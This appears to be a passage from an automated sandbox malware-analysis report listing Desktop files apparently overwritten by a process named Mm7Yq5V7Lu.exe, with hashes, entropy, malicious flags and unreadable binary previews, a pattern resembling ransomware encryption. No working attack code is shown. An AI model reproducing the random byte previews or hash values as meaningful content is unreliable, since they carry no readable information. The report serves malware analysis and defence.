                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.006759837304578
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:BfVeDjMCk2cKs/KhTvbEVSFVKzCwgck38uJ:jeXMCkrfChTbFQzTEdJ
                                                                                                                                                      MD5:3615874CE15C17E32BF5065C818FF2B6
                                                                                                                                                      SHA1:A86CCECA686EB7ED61A28E8E9957C7E055240546
                                                                                                                                                      SHA-256:38615DFBCE3FD70797A6AED59E3BAC35210B3577C8561341581BE0FB2482DAAA
                                                                                                                                                      SHA-512:81C0560E4880ADBAD134D427D1484EBD13C5723A58D201A289418720C290DE6313139C41B0F66165FF2241DB151D044B1CA38C608DCFBD267E767D06E0BCF509
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .9..A..:=.....;s...~..f..0.*Fp9R..3".c{h.2q..J.?1......d_?v.h.G.?/..RL...T.>aht....D.lx.....4.c.^..E..q..3..& ...{...^...s.b.l..5...W.....=0.&..b/....$*...v..ko4.;B..7....{.u..s.........}.}>...B...x.,...$.~....z=...4.@^...".t..,#.....*~:.Q..C..}I...9..v..Hr.E.{..X..{jp..zXX.....,b...z.n.?.J......H.J.B.;,x!.KV.Z..?......\}d.-K.VM......[..6.+Er......~ .....F.PE.k..6F..:....Z...v.}s.\..k.....e{.@.Jji..J5..v..?z.^..RO....[{.!.2..&..T.......EQ..E.%.~tr...:.){%R.`x.D/.<...../w..Dr.x.s.ZbS.(`..9.a..q....+.&N.:g.?.8.W.....*.L6T....N.X.\.|z...A.A.JJ<...Q..Ur.o+w............i...zq.l`......S....Un{.Hd2%$..3...f.)...Upq.......S.Z.f.....=W.'...cWC.>dEg.<.h.c..c'*...]|.4..t.`^.....4..a.Z...`....T.E...Xe..L..$q*".M......Nn.iI..m...fNS...UGz...U....U\....`r'.@..9.n.. .3....S!...F4.e..O....&.rJ..w...O....._cb.......D.l.$..[.9...~Nl....../f'....lti..t...d[..CLpz...M..n0f..Y.."...$.i...........x.t........B!.s{........(.@*.f.....l..c....Ia.C...F4..........._.
                                                                                                                                                      C:\Users\user\Desktop\EFOYFBOLXA.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.006759837304578
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:BfVeDjMCk2cKs/KhTvbEVSFVKzCwgck38uJ:jeXMCkrfChTbFQzTEdJ
                                                                                                                                                      MD5:3615874CE15C17E32BF5065C818FF2B6
                                                                                                                                                      SHA1:A86CCECA686EB7ED61A28E8E9957C7E055240546
                                                                                                                                                      SHA-256:38615DFBCE3FD70797A6AED59E3BAC35210B3577C8561341581BE0FB2482DAAA
                                                                                                                                                      SHA-512:81C0560E4880ADBAD134D427D1484EBD13C5723A58D201A289418720C290DE6313139C41B0F66165FF2241DB151D044B1CA38C608DCFBD267E767D06E0BCF509
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .9..A..:=.....;s...~..f..0.*Fp9R..3".c{h.2q..J.?1......d_?v.h.G.?/..RL...T.>aht....D.lx.....4.c.^..E..q..3..& ...{...^...s.b.l..5...W.....=0.&..b/....$*...v..ko4.;B..7....{.u..s.........}.}>...B...x.,...$.~....z=...4.@^...".t..,#.....*~:.Q..C..}I...9..v..Hr.E.{..X..{jp..zXX.....,b...z.n.?.J......H.J.B.;,x!.KV.Z..?......\}d.-K.VM......[..6.+Er......~ .....F.PE.k..6F..:....Z...v.}s.\..k.....e{.@.Jji..J5..v..?z.^..RO....[{.!.2..&..T.......EQ..E.%.~tr...:.){%R.`x.D/.<...../w..Dr.x.s.ZbS.(`..9.a..q....+.&N.:g.?.8.W.....*.L6T....N.X.\.|z...A.A.JJ<...Q..Ur.o+w............i...zq.l`......S....Un{.Hd2%$..3...f.)...Upq.......S.Z.f.....=W.'...cWC.>dEg.<.h.c..c'*...]|.4..t.`^.....4..a.Z...`....T.E...Xe..L..$q*".M......Nn.iI..m...fNS...UGz...U....U\....`r'.@..9.n.. .3....S!...F4.e..O....&.rJ..w...O....._cb.......D.l.$..[.9...~Nl....../f'....lti..t...d[..CLpz...M..n0f..Y.."...$.i...........x.t........B!.s{........(.@*.f.....l..c....Ia.C...F4..........._.
                                                                                                                                                      C:\Users\user\Desktop\EIVQSAOTAQ.png
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.039404434082101
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:XuvypsnYLLjLXkFtUp+3mtorH7bczCwgck384:+0ffP0FtUpKp4zTEr
                                                                                                                                                      MD5:69DBCA5805C01FB5112ED569529CFBE3
                                                                                                                                                      SHA1:D1828A0E6BFCB16CA472467C11630CACD40E243A
                                                                                                                                                      SHA-256:AFB57AAD0BF5C32BB12AC8AFA8C84DA1A1656D34D32F4374A93D8B8A89BCE066
                                                                                                                                                      SHA-512:06B0A0D54442ABD3616A9A42B1A684675DD088C2D944832A03012204232E6288AF75B005DD0A601A54B20716D98352A4891E73950B3C1ADE31D4FD6A5A54084B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Mq..=.lY.zL..r....8....m........m......v..*@.T.|B..#..e...z...|..AU0.....*Uj.^Eu.K.,.C:.R..^H.|...P....Sk;z8.TR...:!.w......r.?.Q.Y.i...O..n.....9...,.2..xJ0..p.q.@`\.....5.dH..>n...$.#..V.......p..1%..:.[...C.|.`.;A.n.. .].({..-.@......cP.TZkG.y5..J8....'^.p.5.....k.)........Z....vW.^.....g2...-...|..t....o.+Y...2-.^!S...R..`.>/&..8...[.A9....<......\...N)..A.!.....j.].9h...D@.VB.X.*.{.."..z..<.tG.%......Pu...}...<....Y5E2........:|.G.B...sl}..p=.-/X..y{n....T.....Z.........>....l..U.....4|V..Ll..Y.....x..@......3.ar.....q.]1;.1........9I......{.+...GtM..F....IdG...b.....g..m..W.....f!.x..l;...u...4%.&>.N.....O.....^O...j.a..!.H..t...6..{.S..@?K....>.... q%....S..N#m..2..1...w....euT...-2....$/z......@.{`.Fm......p...........1...@.l..Z+.(.k......_,../w7........f..Q....>......&P}.M.V..7.x.P.....Xp\n.-b..v...IY......*4.sB..u.V.ue..oT7.^....;.....6.....u..e.I..4......u..O.(.....^..*.."..}f7.M........O#.r4....;..=.[.......n.O.
                                                                                                                                                      C:\Users\user\Desktop\EIVQSAOTAQ.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.039404434082101
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:XuvypsnYLLjLXkFtUp+3mtorH7bczCwgck384:+0ffP0FtUpKp4zTEr
                                                                                                                                                      MD5:69DBCA5805C01FB5112ED569529CFBE3
                                                                                                                                                      SHA1:D1828A0E6BFCB16CA472467C11630CACD40E243A
                                                                                                                                                      SHA-256:AFB57AAD0BF5C32BB12AC8AFA8C84DA1A1656D34D32F4374A93D8B8A89BCE066
                                                                                                                                                      SHA-512:06B0A0D54442ABD3616A9A42B1A684675DD088C2D944832A03012204232E6288AF75B005DD0A601A54B20716D98352A4891E73950B3C1ADE31D4FD6A5A54084B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Mq..=.lY.zL..r....8....m........m......v..*@.T.|B..#..e...z...|..AU0.....*Uj.^Eu.K.,.C:.R..^H.|...P....Sk;z8.TR...:!.w......r.?.Q.Y.i...O..n.....9...,.2..xJ0..p.q.@`\.....5.dH..>n...$.#..V.......p..1%..:.[...C.|.`.;A.n.. .].({..-.@......cP.TZkG.y5..J8....'^.p.5.....k.)........Z....vW.^.....g2...-...|..t....o.+Y...2-.^!S...R..`.>/&..8...[.A9....<......\...N)..A.!.....j.].9h...D@.VB.X.*.{.."..z..<.tG.%......Pu...}...<....Y5E2........:|.G.B...sl}..p=.-/X..y{n....T.....Z.........>....l..U.....4|V..Ll..Y.....x..@......3.ar.....q.]1;.1........9I......{.+...GtM..F....IdG...b.....g..m..W.....f!.x..l;...u...4%.&>.N.....O.....^O...j.a..!.H..t...6..{.S..@?K....>.... q%....S..N#m..2..1...w....euT...-2....$/z......@.{`.Fm......p...........1...@.l..Z+.(.k......_,../w7........f..Q....>......&P}.M.V..7.x.P.....Xp\n.-b..v...IY......*4.sB..u.V.ue..oT7.^....;.....6.....u..e.I..4......u..O.(.....^..*.."..}f7.M........O#.r4....;..=.[.......n.O.
                                                                                                                                                      C:\Users\user\Desktop\EOWRVPQCCS.jpg
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.010305704877352
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:KWOAx+rgBqHIsVFmHtDhRr1GHcjluJQH+MzCwgck38H0:KM1BEIsVFItDhWHcTHFzTEv
                                                                                                                                                      MD5:F2CEFF56E36403E950CA325AABAE3E52
                                                                                                                                                      SHA1:73F2ECA020E29AC10C60D6149EB219DB63634EC1
                                                                                                                                                      SHA-256:EAE82FACEAF3AA5A624A152F43D5F1764A292520AF348BDB6E144D8FCBF81661
                                                                                                                                                      SHA-512:D89B0CB54BB9AA2D513AABA4F4C6FEB97C61217B321DE49E8224550C28F2557E5872920BFAD3436F25E77B9EE277DB346F3C501D60E3C70C343B90A159237AFA
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: ....!.b...o..1..K.7.^j..CW2x..V..d%L......".h.`........,...........C.V..'q.:Y...@..X.8.G..qp)..9p.F.."..n..#.@.0...0f.{...SC.i.HYt}....G..l.[...M.t.'...{..g.=..F.u.z.KS...5...+..q....q..|L'.o.-.N.2...[D.L..........b..)U.#.../V..F4...L.....m..uU....|..u.......q..i<...6#..08.e..m..`..q..c?..... ...3i(.Y]+.2\........+..T>;._.X!...wfe.9r.J..\.[....P.).....g....@#.2..R.......q.*...(...;.I.``...gB..F.t.b...f..ou;v..Q....1.W..1.x..Q...#..Vx....~..V..<&....Y\'...Z......b#.l.{M.@j.3.R$.....U5.....D. CI.C1.M54".w/..9B.....J..7...]..@.....p..D.-....4.{v.Uv...F...{r[h..A.?.X...h.&<.:.UyR ..;b.S2m-RH_K..4..../1...W;.H..#..W.rZJ..".$w.....O#e..~t...P)..&...H...p.....8.o.O..>...U.nWP~..RE./.%h9...*......L....U{.9h;wF........r....+....x..R.-....s..=k....Gh.d..V....4.>.+".......j.s....t....Z.~.u.......<.1'. .->,.!.Ro8E........g.o].*D..\.s(..).c^.CN$.../X.....:..'..j0..`f..F..N.V.C.B.8.".8(..}...\@.q.9....3....%..U|X.~..EK?.&.*"<f..Od..JR..I..
                                                                                                                                                      C:\Users\user\Desktop\EOWRVPQCCS.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.010305704877352
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:KWOAx+rgBqHIsVFmHtDhRr1GHcjluJQH+MzCwgck38H0:KM1BEIsVFItDhWHcTHFzTEv
                                                                                                                                                      MD5:F2CEFF56E36403E950CA325AABAE3E52
                                                                                                                                                      SHA1:73F2ECA020E29AC10C60D6149EB219DB63634EC1
                                                                                                                                                      SHA-256:EAE82FACEAF3AA5A624A152F43D5F1764A292520AF348BDB6E144D8FCBF81661
                                                                                                                                                      SHA-512:D89B0CB54BB9AA2D513AABA4F4C6FEB97C61217B321DE49E8224550C28F2557E5872920BFAD3436F25E77B9EE277DB346F3C501D60E3C70C343B90A159237AFA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....!.b...o..1..K.7.^j..CW2x..V..d%L......".h.`........,...........C.V..'q.:Y...@..X.8.G..qp)..9p.F.."..n..#.@.0...0f.{...SC.i.HYt}....G..l.[...M.t.'...{..g.=..F.u.z.KS...5...+..q....q..|L'.o.-.N.2...[D.L..........b..)U.#.../V..F4...L.....m..uU....|..u.......q..i<...6#..08.e..m..`..q..c?..... ...3i(.Y]+.2\........+..T>;._.X!...wfe.9r.J..\.[....P.).....g....@#.2..R.......q.*...(...;.I.``...gB..F.t.b...f..ou;v..Q....1.W..1.x..Q...#..Vx....~..V..<&....Y\'...Z......b#.l.{M.@j.3.R$.....U5.....D. CI.C1.M54".w/..9B.....J..7...]..@.....p..D.-....4.{v.Uv...F...{r[h..A.?.X...h.&<.:.UyR ..;b.S2m-RH_K..4..../1...W;.H..#..W.rZJ..".$w.....O#e..~t...P)..&...H...p.....8.o.O..>...U.nWP~..RE./.%h9...*......L....U{.9h;wF........r....+....x..R.-....s..=k....Gh.d..V....4.>.+".......j.s....t....Z.~.u.......<.1'. .->,.!.Ro8E........g.o].*D..\.s(..).c^.CN$.../X.....:..'..j0..`f..F..N.V.C.B.8.".8(..}...\@.q.9....3....%..U|X.~..EK?.&.*"<f..Od..JR..I..
                                                                                                                                                      C:\Users\user\Desktop\Excel 2016.lnk
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3616
                                                                                                                                                      Entropy (8bit):7.6024250634851205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:cI8Y0OAznnLChy2TpOdD+Av49n3n2XivGQzTER:c51TWBVjAv49n3Yew
                                                                                                                                                      MD5:EF78D167D3EF6A5305693DB1FD1B84BE
                                                                                                                                                      SHA1:F4BF7E5CF36A939867CFEC1ED29F01A1C93F6A92
                                                                                                                                                      SHA-256:4249D13623621393E1007F33F681C35ED26C251B3DD99ECCFC823A94CFF9ECC9
                                                                                                                                                      SHA-512:88D453BA18E2A0B43BC21928DCFF8A1B59A481C567A898E9B2B3A2C04CF49C50315084CAAB97AD72A879CE1D07962B8B33D6B0C9E7E766F7F019323218308473
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .U..1....`...y0......g.......q.'....-.p.0x..T.D..9...Q'18.Jb.D.T..".@....@K....EF..u.3..[.~.@.......{.U..............J.V........Bt$[..c...'.*.....sX8.i.d&o...%.sU9a...2'.8..OJ..|.... i~..Dse.......y...hp\...?xU..7.=....S..z.....W.\...f..a...aIA:D..6....-c..@[...E.k*.$y......g.W.....w\.6..j.C..Z..}..Ea.n2..@..-q.)4*M.}+....-9.......|%...ukcQ...>zM.[..y{[4(.F.Zi..e....7-.|.o8.X.qa.]8.=..R..t..q#.M.t=..`Og........7jF......D..%...J.zj...F.....y...?t-?....N.l....Z..n......3..%=..t5X._.\....xc'.*\.~+.d.pb...+N.B.S...7...CJ$..Tn.fJ.....o.-K..}.GN...[...y..o.r_...[K..Y....5...}.....`:.q=...J....?.f.....&.Qw.]2[....7..?"8.-S...d.3......Ec..#.IE.6..y..y..gzi..z..R.\.{7.....y.......:.fm.Y.r.......%..s..JK..-IzZ....F.qo..g.A:...h...[qs9B.+r..Kf...b0.x.?}...T.......DU.:.".#Qf....._.P.=..}.H.;.J3..-..c.'./f.+.Z..:f..3...>.R..$!m.$...qRf.Z.1.o.]...POj...k..@x..S_n..:.Yr.........,..........n...D.CY....?.(....MW_t=.N&..?.{.p.....G.......B..q?TKi..~M....#..Q.n`.
                                                                                                                                                      C:\Users\user\Desktop\Excel 2016.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3616
                                                                                                                                                      Entropy (8bit):7.6024250634851205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:cI8Y0OAznnLChy2TpOdD+Av49n3n2XivGQzTER:c51TWBVjAv49n3Yew
                                                                                                                                                      MD5:EF78D167D3EF6A5305693DB1FD1B84BE
                                                                                                                                                      SHA1:F4BF7E5CF36A939867CFEC1ED29F01A1C93F6A92
                                                                                                                                                      SHA-256:4249D13623621393E1007F33F681C35ED26C251B3DD99ECCFC823A94CFF9ECC9
                                                                                                                                                      SHA-512:88D453BA18E2A0B43BC21928DCFF8A1B59A481C567A898E9B2B3A2C04CF49C50315084CAAB97AD72A879CE1D07962B8B33D6B0C9E7E766F7F019323218308473
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .U..1....`...y0......g.......q.'....-.p.0x..T.D..9...Q'18.Jb.D.T..".@....@K....EF..u.3..[.~.@.......{.U..............J.V........Bt$[..c...'.*.....sX8.i.d&o...%.sU9a...2'.8..OJ..|.... i~..Dse.......y...hp\...?xU..7.=....S..z.....W.\...f..a...aIA:D..6....-c..@[...E.k*.$y......g.W.....w\.6..j.C..Z..}..Ea.n2..@..-q.)4*M.}+....-9.......|%...ukcQ...>zM.[..y{[4(.F.Zi..e....7-.|.o8.X.qa.]8.=..R..t..q#.M.t=..`Og........7jF......D..%...J.zj...F.....y...?t-?....N.l....Z..n......3..%=..t5X._.\....xc'.*\.~+.d.pb...+N.B.S...7...CJ$..Tn.fJ.....o.-K..}.GN...[...y..o.r_...[K..Y....5...}.....`:.q=...J....?.f.....&.Qw.]2[....7..?"8.-S...d.3......Ec..#.IE.6..y..y..gzi..z..R.\.{7.....y.......:.fm.Y.r.......%..s..JK..-IzZ....F.qo..g.A:...h...[qs9B.+r..Kf...b0.x.?}...T.......DU.:.".#Qf....._.P.=..}.H.;.J3..-..c.'./f.+.Z..:f..3...>.R..$!m.$...qRf.Z.1.o.]...POj...k..@x..S_n..:.Yr.........,..........n...D.CY....?.(....MW_t=.N&..?.{.p.....G.......B..q?TKi..~M....#..Q.n`.
                                                                                                                                                      C:\Users\user\Desktop\GIGIYTFFYT.mp3
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.005137365299936
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:RCQkPf9aFxUMS2agmTy13SSl+3TT90HizCwgck38o:RgyjagLFlOqHizTEL
                                                                                                                                                      MD5:D58657F8BDC1CB781F553C0F2D4F8208
                                                                                                                                                      SHA1:82FB7CB9E375112E8CBC2C9FFE2A33280D5C4DD5
                                                                                                                                                      SHA-256:EEEFC5CEEED981FBDD853FF27F9BBD949DAE31632274F1B0435BBE1BFFEA54E9
                                                                                                                                                      SHA-512:F2DD28D07E4943D27FE2B03A87EBE0E7AF8E706EB5FA1E434538F70F1E7DC55ED6F0553911F4DCAAD39B86AC3C209CF8B451420FE43373F49E1A5E54A56ACDCB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .. v.p..9.VYMK.........'v~30_....E...b=.....#./..:.....z.f8...$Li......w.......#}..g._u0........W.i.O].]....v....Q..K.....l..0.J9h9K.N...DR.;..D.9..?BX.M..p.yb./....s.........e........C}|\..3.[f*g.....dRu./?...:.mZ:4K.&..g#T.Ay...@....~.!?j...6l...........:.g'..D.../.+u.C.....i..3...{)(..H....1.Ok.}BGM...3....D..,..=..M.dl........Y#.n6KUv..5..".2..U{:.a.<.bM&..e.......`..........b.....|..`+.5'Je.fo../..w.Dt.K..'hN.S7..sz.-.L~...(.SW.d4...B....<4?.3L..I.....:m.0.lf.pxt@...n!.2..?.....t...G.O....X...4>JQ.Q...(.h.e...I...~.O....}..)Oj.l..h).>|T.....?......w.Q.}..k.J...k|....m#..k.&..6.p%.....6..!....eH..S.w..|..B...n..6...!.....l......~.c,."..q7.9"...9........$..U:..F../...'.+.m.0..........Dz7q.b.:[1.;..zt....(565..y..P\.!B6...8..4"f...0....aH.....T].2.....P...o.2Rk~[.Tf....,;<S...r.z..\..B......H.<YK$p.3.~..8.FF...$/ZT..).r/..Z.*9...0.......f...~._..R.@...(+..!q..[....mW...U.SC..:}....".<..#j..y.q.K..v....-..D.......E.nWI..l.p}..E...-
                                                                                                                                                      C:\Users\user\Desktop\GIGIYTFFYT.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.005137365299936
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:RCQkPf9aFxUMS2agmTy13SSl+3TT90HizCwgck38o:RgyjagLFlOqHizTEL
                                                                                                                                                      MD5:D58657F8BDC1CB781F553C0F2D4F8208
                                                                                                                                                      SHA1:82FB7CB9E375112E8CBC2C9FFE2A33280D5C4DD5
                                                                                                                                                      SHA-256:EEEFC5CEEED981FBDD853FF27F9BBD949DAE31632274F1B0435BBE1BFFEA54E9
                                                                                                                                                      SHA-512:F2DD28D07E4943D27FE2B03A87EBE0E7AF8E706EB5FA1E434538F70F1E7DC55ED6F0553911F4DCAAD39B86AC3C209CF8B451420FE43373F49E1A5E54A56ACDCB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .. v.p..9.VYMK.........'v~30_....E...b=.....#./..:.....z.f8...$Li......w.......#}..g._u0........W.i.O].]....v....Q..K.....l..0.J9h9K.N...DR.;..D.9..?BX.M..p.yb./....s.........e........C}|\..3.[f*g.....dRu./?...:.mZ:4K.&..g#T.Ay...@....~.!?j...6l...........:.g'..D.../.+u.C.....i..3...{)(..H....1.Ok.}BGM...3....D..,..=..M.dl........Y#.n6KUv..5..".2..U{:.a.<.bM&..e.......`..........b.....|..`+.5'Je.fo../..w.Dt.K..'hN.S7..sz.-.L~...(.SW.d4...B....<4?.3L..I.....:m.0.lf.pxt@...n!.2..?.....t...G.O....X...4>JQ.Q...(.h.e...I...~.O....}..)Oj.l..h).>|T.....?......w.Q.}..k.J...k|....m#..k.&..6.p%.....6..!....eH..S.w..|..B...n..6...!.....l......~.c,."..q7.9"...9........$..U:..F../...'.+.m.0..........Dz7q.b.:[1.;..zt....(565..y..P\.!B6...8..4"f...0....aH.....T].2.....P...o.2Rk~[.Tf....,;<S...r.z..\..B......H.<YK$p.3.~..8.FF...$/ZT..).r/..Z.*9...0.......f...~._..R.@...(+..!q..[....mW...U.SC..:}....".<..#j..y.q.K..v....-..D.......E.nWI..l.p}..E...-
                                                                                                                                                      C:\Users\user\Desktop\GRXZDKKVDB.jpg
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.042681714332841
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:U4lykLcbEN5NX3j8exxsrCkLn8QqzCwgck38+:PUfEN5dIexOrbqzTEx
                                                                                                                                                      MD5:4DE927E4FBDF2C0DE29E7695D47C5029
                                                                                                                                                      SHA1:2858BC902D07C1C3A7EDF9DE97DA35368356D623
                                                                                                                                                      SHA-256:33C0E5B6B7E5642E5B2E98DF4927AB42961D7EDABD4B8B4C2904196BA69BBA4A
                                                                                                                                                      SHA-512:7F7C20E9A7D1656DFFCD4A7C661F623EA6B03E06E76B27A7F98EA2823D02A9AC5EF87017CFDE4B07394EE31182A4C9D0C4C3ED51A474B5EC20AD984802C3B417
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ,.3.......=i....=..Z.z......=@[..2.5]]..F.w..Kw..D.;..NW..T.X@.6.xH.1....N.,l..D..Q...R..Q...#.G..I....hT..zD.x.....O4...S.%......p)J.Z..w%./....>.U.OO...N....y.m.\...a..r..l.k..F:.[G....../e../..#.0. ,......D.a.x...(O$@.H8...h...V5.rL...).+..K..!...b..R........wA......Y..t...(R..U...&....o(..Y%........[.#...M.z...H.\\)..o.....1.`..........i.TO7}.A.e.....*...l..7b|.0-%.d&.o.I.5...P.5.......2L.noE.o%..u*.'cbwe.m.@.K.x .*..?..).K[.r.B..:.\.....2=...w.P.B@...W...*.R.:./@~.0.'.V?.I.S.w.].;.Z..Qy....h.z8...[+.^.N4....A.7...Y+.;.eKHD...|.n.3......U..i..6.%Qj`..n....p..A..w......+..n./..n.Uu.. t"Q..OGy.._h.c...j.t\B.'.r..q.Q...n..V.....!#n_.......a..~.U...p.W.%.._.y.]K)<......K...we.g.-$.c....-gn..N.y.b2..V...7Q*z$Y.=..Y5Jn."......\..q.U.%o..s).........>{9H:.S@'0`.....U...T.~.o@A.g......Y`.v.>t..<.....x.|..'O....r... ...y.I.$MTFe<..YT....U_....?..h}...q.2._....;Wf...h......2e'..-......X.IPTB.L:v.H.cG.......BFLk...".U=...eO.Tr.E]..*".Z..a74.sI.a....
                                                                                                                                                      C:\Users\user\Desktop\GRXZDKKVDB.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.042681714332841
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:U4lykLcbEN5NX3j8exxsrCkLn8QqzCwgck38+:PUfEN5dIexOrbqzTEx
                                                                                                                                                      MD5:4DE927E4FBDF2C0DE29E7695D47C5029
                                                                                                                                                      SHA1:2858BC902D07C1C3A7EDF9DE97DA35368356D623
                                                                                                                                                      SHA-256:33C0E5B6B7E5642E5B2E98DF4927AB42961D7EDABD4B8B4C2904196BA69BBA4A
                                                                                                                                                      SHA-512:7F7C20E9A7D1656DFFCD4A7C661F623EA6B03E06E76B27A7F98EA2823D02A9AC5EF87017CFDE4B07394EE31182A4C9D0C4C3ED51A474B5EC20AD984802C3B417
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ,.3.......=i....=..Z.z......=@[..2.5]]..F.w..Kw..D.;..NW..T.X@.6.xH.1....N.,l..D..Q...R..Q...#.G..I....hT..zD.x.....O4...S.%......p)J.Z..w%./....>.U.OO...N....y.m.\...a..r..l.k..F:.[G....../e../..#.0. ,......D.a.x...(O$@.H8...h...V5.rL...).+..K..!...b..R........wA......Y..t...(R..U...&....o(..Y%........[.#...M.z...H.\\)..o.....1.`..........i.TO7}.A.e.....*...l..7b|.0-%.d&.o.I.5...P.5.......2L.noE.o%..u*.'cbwe.m.@.K.x .*..?..).K[.r.B..:.\.....2=...w.P.B@...W...*.R.:./@~.0.'.V?.I.S.w.].;.Z..Qy....h.z8...[+.^.N4....A.7...Y+.;.eKHD...|.n.3......U..i..6.%Qj`..n....p..A..w......+..n./..n.Uu.. t"Q..OGy.._h.c...j.t\B.'.r..q.Q...n..V.....!#n_.......a..~.U...p.W.%.._.y.]K)<......K...we.g.-$.c....-gn..N.y.b2..V...7Q*z$Y.=..Y5Jn."......\..q.U.%o..s).........>{9H:.S@'0`.....U...T.~.o@A.g......Y`.v.>t..<.....x.|..'O....r... ...y.I.$MTFe<..YT....U_....?..h}...q.2._....;Wf...h......2e'..-......X.IPTB.L:v.H.cG.......BFLk...".U=...eO.Tr.E]..*".Z..a74.sI.a....
                                                                                                                                                      C:\Users\user\Desktop\GRXZDKKVDB.xlsx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.001414920840119
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:79MnNDI7xk/q6cvgPWhCaZ9J1SQ5EcypcgHMGzZZizAjeenW8OyUWxzK8sevWAVN:79MCxk/q6zinPoOtWxzCwgck383
                                                                                                                                                      MD5:6455E8DE68ECBAB8FA0C65F162436081
                                                                                                                                                      SHA1:73BE08E6E988922139856068E6D7C14FE55DDA81
                                                                                                                                                      SHA-256:2738CA9E40682A319AB748B5CDD649243A80D3006C86191C919E07BDEF353E5C
                                                                                                                                                      SHA-512:DC23CC1E09166063367B2079525C1E82DFF903CA3249ADF86413FAE726E56DE14EEB312AFB06DF4898BAAE188CA5E347014BBAAB8BCE7CC6DA04F9B9A165EE2C
                                                                                                                                                      Malicious:false
